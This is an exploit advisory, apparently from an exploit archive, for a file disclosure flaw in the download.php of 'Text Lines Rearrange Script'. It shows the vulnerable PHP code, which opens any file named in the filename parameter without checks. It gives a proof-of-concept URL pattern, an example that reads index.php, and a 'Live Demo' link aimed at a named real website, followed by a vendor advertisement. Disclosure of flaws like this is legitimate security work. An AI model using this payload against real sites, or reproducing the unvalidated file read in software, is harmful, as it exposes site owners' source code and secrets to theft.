Text Lines Rearrange Script (filename) File Disclosure Vulnerability Discovered By SirGod and Greet
====================================================================
Text Lines Rearrange Script (filename) File Disclosure Vulnerability
====================================================================
#############################################################################################
[+] Text Lines Rearrange Script (download.php filename) File
[+]Disclosure Vulnerability
[+] Discovered By SirGod
[+] Greetz : All my friends
#############################################################################################
[+] File Disclosure Vulnerability
Vulnerable Code in download.php :
-----------------------------------------------------
if(file_exists($filename))
{
$fp=fopen($filename,"r");
$content=fread($fp,filesize($filename));
fclose($fp);
------------------------------------------------------
PoC :
http://[target]/[path]/download.php?filename=[Local File]
Example :
http://[target]/[path]/download.php?filename=index.php
Live Demo :
http://www.rightscripts.com/listrearrange/download.php?filename=index.php
#############################################################################################
# 0day.today [2018-03-13] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo